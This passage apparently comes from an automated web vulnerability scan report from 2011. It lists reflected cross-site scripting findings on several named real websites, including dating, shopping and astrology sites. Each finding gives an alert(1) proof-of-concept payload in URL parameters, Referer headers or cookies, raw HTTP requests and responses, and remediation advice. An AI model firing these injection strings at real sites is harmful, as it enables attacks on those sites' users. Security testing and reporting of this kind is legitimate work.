Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.186. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eafc8'%3balert(1)//d51e789b63c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eafc8';alert(1)//d51e789b63c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd6e'-alert(1)-'ffbf5d29f3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ab7'-alert(1)-'0c818bb51b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97560'%3balert(1)//13ee165c502 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 97560';alert(1)//13ee165c502 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.190. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8bec'%3balert(1)//b4371b6b088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8bec';alert(1)//b4371b6b088 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b46e'-alert(1)-'4a2054d239f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b969'-alert(1)-'7fd789453ef was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c7'%3balert(1)//069506a5e91 was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as ea3c7';alert(1)//069506a5e91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:58:45 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ea3c7';alert(1)//069506a5e91http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.194. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 545d8'%3balert(1)//bf962870449 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 545d8';alert(1)//bf962870449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecb0'-alert(1)-'a7842f1522e was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1e3d'-alert(1)-'9b801991a87 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:41:03 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... tamp%5d%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Ba1e3d'-alert(1)-'9b801991a87%3B4021250%3Bclickvars="> ...[SNIP]...
2.197. http://www.meetic-partners.com/diff/58/645868/show23.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/diff/58/645868/show23.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4699e'-alert(1)-'aa0e0877ff0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a38"><script>alert(1)</script>5c3bbcef668 was submitted in the pid parameter. This input was echoed as 86a38\"><script>alert(1)</script>5c3bbcef668 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /register.php?pid=2186a38"><script>alert(1)</script>5c3bbcef668 HTTP/1.1 Host: www.pageshoppe.me Proxy-Connection: keep-alive Referer: http://www.pageshoppe.com/vpn.html?gclid=CJnP9v-9sKoCFcYQNAodzn4A8A User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6226'%3balert(1)//20733e1b871 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a6226';alert(1)//20733e1b871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1bff"><script>alert(1)</script>3dd008c56b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ac5"><script>alert(1)</script>7a14d091d7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.russellgrant.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:11:22 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.17-0.dotdeb.0 Last-Modified: Wed, 03 Aug 2011 13:11:22 GMT Connection: close Content-Type: text/html Content-Length: 62295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Psychic Readings, Astrology Predictions and Horoscopes - Russell Grant</title> <meta http- ...[SNIP]... .google-analytics.com/__utm.gif?utmwv=3&utmn=1123795032&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=russellgrant.com&utmhid=1123795032&utmr=http://www.google.com/search?hl=en&q=e4ac5"><script>alert(1)</script>7a14d091d7e&utmp=/nojs_tracker/&utmac=UA-1322086-1&utmcc=__utma%3D55449304.1411259668.1312377083.1312377083.1312377083.2%3B%2B__utmz%3D55449304.1312377083.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_M ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc7e1<script>alert(1)</script>0d14b635a4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/ HTTP/1.1 Host: adomas.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: redir-httpd Date: Sun, 07 Aug 2011 01:21:15 GMT Location: http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/ Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT Content-Length: 243 Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/">http://www.adomas.org/javascript-mouse-wheelcc7e1<script>alert(1)</script>0d14b635a4b/</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed24"><script>alert(1)</script>8ed9d5046df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/ HTTP/1.1 Host: adomas.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: redir-httpd Date: Sun, 07 Aug 2011 01:21:13 GMT Location: http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/ Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT Content-Length: 247 Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheelbed24"><script>alert(1)</script>8ed9d5046df/">http://www.adomas.org/javascript-mouse-wheelbed24"><script>a ...[SNIP]...
2.204. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://adomas.org
Path:
/javascript-mouse-wheel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00d8"><script>alert(1)</script>f543c4bfe8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1 HTTP/1.1 Host: adomas.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: redir-httpd Date: Sun, 07 Aug 2011 01:21:05 GMT Location: http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1 Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT Content-Length: 253 Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?b00d8"><script>alert(1)</script>f543c4bfe8d=1">http://www.adomas.org/javascript-mouse-wheel/?b00d8"><scr ...[SNIP]...
2.205. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://adomas.org
Path:
/javascript-mouse-wheel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 73ea8<script>alert(1)</script>ba887adcdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1 HTTP/1.1 Host: adomas.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: redir-httpd Date: Sun, 07 Aug 2011 01:21:06 GMT Location: http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1 Last-Modified: Sat, 06 Aug 2011 22:03:19 GMT Content-Length: 249 Content-Type: text/html; charset=utf-8
<html><body>You are now redirected to<br><a href="http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1">http://www.adomas.org/javascript-mouse-wheel/?73ea8<script>alert(1)</script>ba887adcdd2=1</a> ...[SNIP]...
The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed3a1"><script>alert(1)</script>ab6675584f4 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c36"-alert(1)-"9db60257ee8 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb328'%3b0599b256b6d was submitted in the bdm_unique cookie. This input was echoed as bb328';0599b256b6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="pt-br"> <head> <title>Ecologia para vestir - Mundo Melhor no Bolsa de Mulher | MSN Mulher</titl ...[SNIP]... <script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-717773-15']);
The value of the bdm_unique cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf46'%3balert(1)//bedb0aaa228 was submitted in the bdm_unique cookie. This input was echoed as adf46';alert(1)//bedb0aaa228 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Wed, 03 Aug 2011 12:00:29 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Server: webhead-01 Content-Length: 26567
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="pt-br"> <head> <title>Bolsa de Mulher. O melhor conte..do com a maior rede de amigas da interne ...[SNIP]... <script type="text/javascript">
var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-717773-15']);
The value of the lmdinfo cookie is copied into the HTML document as plain text between tags. The payload fa779<a>1b2bafb06a9 was submitted in the lmdinfo cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.